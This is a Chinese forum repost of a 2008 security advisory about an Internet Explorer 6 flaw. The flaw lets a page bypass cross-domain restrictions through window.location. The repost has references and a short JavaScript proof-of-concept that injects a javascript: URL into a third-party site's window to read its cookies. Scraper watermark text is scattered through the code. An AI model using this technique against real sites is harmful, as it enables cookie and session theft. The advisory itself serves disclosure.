|  
 帖子317 积分580 威望823  金钱509  在线时间5 小时 
 | 
【业界】Microsoft IE location及location.href绕过跨域安全限制漏洞 
| Microsoft IE location及location.href绕过跨域安全限制漏洞 更新时间:2008-7-2 0:04:33责任编辑:阿loosen
 
 热 点:
 
 发布日期:2008-06-26
 更新日期:2008-06-27
 
 受影响系统:
 
 Microsoft Internet Explorer 6.0
 - Microsoft Windows XP SP2
 
 描述:BUGTRAQ ID: 29960
 
 Internet Explorer是微软发布的非常流行的WEB浏览器。
 
 IE没有正确地处理窗口对象的location或location.href属性,如果用户受骗访问了恶意站点的话,就会绕过跨域安全限制,在用户浏览器会话中执行任意指令。 黑客
 
 这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。 网络安全
 
 <*来源:rayh4c (http://www.astcn.net/mailto:rayh4c@80sec.com]rayh4c@80sec.com) 信息来自:http://www.3ast.com.cn
 
 链接:http://secunia.com/advisories/30857/]http://secunia.com/advisories/30857/ 网络安全
 http://blogs.zdnet.com/security/?p=1348
 http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt 网络安全
 http://www.kb.cert.org/vuls/id/923508
 *>
 
 测试方法:
 
 警 告
 
 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
 <a href="">IE6 Cross Domain Scripting</a>
 <script>
 function win(){
 x=window.open(’http://www.phpwind.net]http://www.phpwind.net'); 网络安全
 setTimeout(function(){
 x.location=new String("javascript:alert(document.cookie)") 信息来自:http://www.3ast.com.cn
 },3000)
 }
 window.onload=function(){
 for (i=0;i<document.links.length;i++) {
 document.links.href="javascript:win()"
 }
 }
 </script>
 
 建议:厂商补丁:
 
 Microsoft
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
 http://www.microsoft.com/windows/ie/default.asp
 | 
 |